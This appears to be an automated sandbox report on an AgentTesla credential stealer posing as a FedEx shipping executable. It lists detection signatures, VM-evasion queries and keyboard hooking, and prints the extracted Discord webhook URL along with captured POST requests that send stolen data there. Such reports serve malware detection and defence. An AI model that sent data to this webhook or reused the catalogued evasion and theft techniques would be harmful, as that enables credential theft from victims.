
Windows Analysis Report
FeDex_shipping_document.exe

Overview

General Information

Sample Name: FeDex_shipping_document.exe
Analysis ID: 830454
MD5: 5cf87a160007a5e6c7a4d24e1d831327
SHA1: e11d7467bc961d5ff16c3541200be1ad5083cefa
SHA256: 91e74ee16f6229b18ef4f973494b8ec68bad3420e90fd3f1ee6d835048421fcf
Tags: AgentTesla, exe, FedEx

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file name differs from the original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • FeDex_shipping_document.exe (PID: 5300 cmdline: C:\Users\user\Desktop\FeDex_shipping_document.exe MD5: 5CF87A160007A5E6C7A4D24E1D831327)
    • FeDex_shipping_document.exe (PID: 3628 cmdline: C:\Users\user\Desktop\FeDex_shipping_document.exe MD5: 5CF87A160007A5E6C7A4D24E1D831327)
  • cleanup
{"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj"}
Source | Rule | Description | Author | Strings
00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: FeDex_shipping_document.exe PID: 3628 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: FeDex_shipping_document.exe PID: 3628 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

No Sigma rule has matched

Snort alert:
Timestamp: 03/20/23-11:52:05.074477
Source IP: 192.168.2.7
Destination IP: 162.159.138.232
SID: 2851779
Source Port: 49701
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: FeDex_shipping_document.exe | ReversingLabs: Detection: 38%
Source: FeDex_shipping_document.exe | Virustotal: Detection: 34%
Source: FeDex_shipping_document.exe | Joe Sandbox ML: detected
Source: 0.2.FeDex_shipping_document.exe.4549c80.9.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Discord", "Discord url": "https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj"}
Source: FeDex_shipping_document.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: FeDex_shipping_document.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: nlsY.pdb source: FeDex_shipping_document.exe
Source: Binary string: nlsY.pdbSHA256 source: FeDex_shipping_document.exe

Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.7:49701 -> 162.159.138.232:443
Source: unknown | DNS query: name: api.ipify.org
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | DNS query: name: api.ipify.org
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | IP Address: 162.159.138.232
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------f62e205f82fd40c8a956e69d1bcde1ed
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: discord.com
    Content-Length: 1217
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    POST /api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj HTTP/1.1
    Content-Type: multipart/form-data; boundary=----------8b7e5ceedd2047309d0db2508590a0cd
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: discord.com
    Content-Length: 2002
    Expect: 100-continue
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://discord.com
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/1085960984071524425/1087327699887980574/user-128757_2023
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/1085960984071524425/1087327704275234847/user-128757_2023
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DL
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.com4
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discord.comD8
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://media.discordapp.net/attachments/1085960984071524425/1087327699887980574/user-128757_20
Source: FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://media.discordapp.net/attachments/1085960984071524425/1087327704275234847/user-128757_20
Source: unknown | DNS traffic detected: queries for: api.ipify.org
Source: unknown | HTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.7:49701 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\FeDex_shipping_document.exe
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06AA1ED8 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06AA25F0,00000000,00000000
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: initial sample | Static PE information: Filename: FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 0_2_0184C844
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 0_2_0184F1E8
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 0_2_0184F1F8
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06AA0B80
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06AAF0D8
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06AAA660
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C9C560
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C91CA4
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C98978
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C92B80
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C92B70
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C9CB21
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06C93950
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E3DD30
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E326C0
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E3168A
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E3AEA8
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E33FE0
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E31DF7
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E388F8
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06E37920
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_070D136B
Source: FeDex_shipping_document.exe, 00000000.00000000.247629334.0000000000F28000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamenlsY.exe> vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000000.00000002.268564133.000000000451B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename48f370b8-933f-4461-84a9-c0775ee1b0df.exe4 vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000000.00000002.273598775.0000000007AE0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameOutimurs.dll2 vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000000.00000002.268564133.00000000041B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOutimurs.dll2 vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000000.00000002.266746771.0000000003287000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCruiser.dll, vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000000.00000002.266746771.00000000031F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCruiser.dll, vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000000.00000002.266746771.00000000031F7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename48f370b8-933f-4461-84a9-c0775ee1b0df.exe4 vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000001.00000002.515103370.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilename48f370b8-933f-4461-84a9-c0775ee1b0df.exe4 vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe, 00000001.00000002.515787794.0000000000F38000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe | Binary or memory string: OriginalFilenamenlsY.exe> vs FeDex_shipping_document.exe
Source: FeDex_shipping_document.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: FeDex_shipping_document.exe | ReversingLabs: Detection: 38%
Source: FeDex_shipping_document.exe | Virustotal: Detection: 34%
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exe
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Process created: C:\Users\user\Desktop\FeDex_shipping_document.exe C:\Users\user\Desktop\FeDex_shipping_document.exe
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FeDex_shipping_document.exe.log
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/2@4/3
Source: FeDex_shipping_document.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: FeDex_shipping_document.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: FeDex_shipping_document.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: FeDex_shipping_document.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: nlsY.pdb source: FeDex_shipping_document.exe
Source: Binary string: nlsY.pdbSHA256 source: FeDex_shipping_document.exe
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 0_2_0184CB36 pushfd ; ret
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_06AAD532 push es; ret
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Code function: 1_2_070D1360 pushfd ; retf
Source: initial sample | Static PE information: section name: .text entropy: 7.872797130775443
Source: C:\Users\user\Desktop\FeDex_shipping_document.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 5296 Thread sleep time: -40023s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 5588 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 5852 Thread sleep count: 9470 > 30
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -13835058055282155s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1200000s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1199750s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1199609s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1199484s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1199356s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1199203s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1199062s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1198943s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1198797s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1198641s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1198495s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1198340s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1198199s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1197797s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1197594s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1197453s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1197296s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1197146s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1197017s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1196889s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1196770s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1196650s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1196530s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1196426s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1196299s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1196145s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1196018s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1195896s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1195760s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1195640s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1195535s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1195348s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1195192s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1195005s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1194848s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1194692s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1194557s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1194442s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1194302s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1194182s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1194066s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1193928s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1193798s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1193634s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1193517s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1193401s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1193286s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1193145s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe TID: 6104 Thread sleep time: -1193005s >= -30000s
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1200000
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1199750
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1199609
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1199484
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1199356
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1199203
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1199062
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1198943
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1198797
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exe Thread delayed: delay time: 1198641
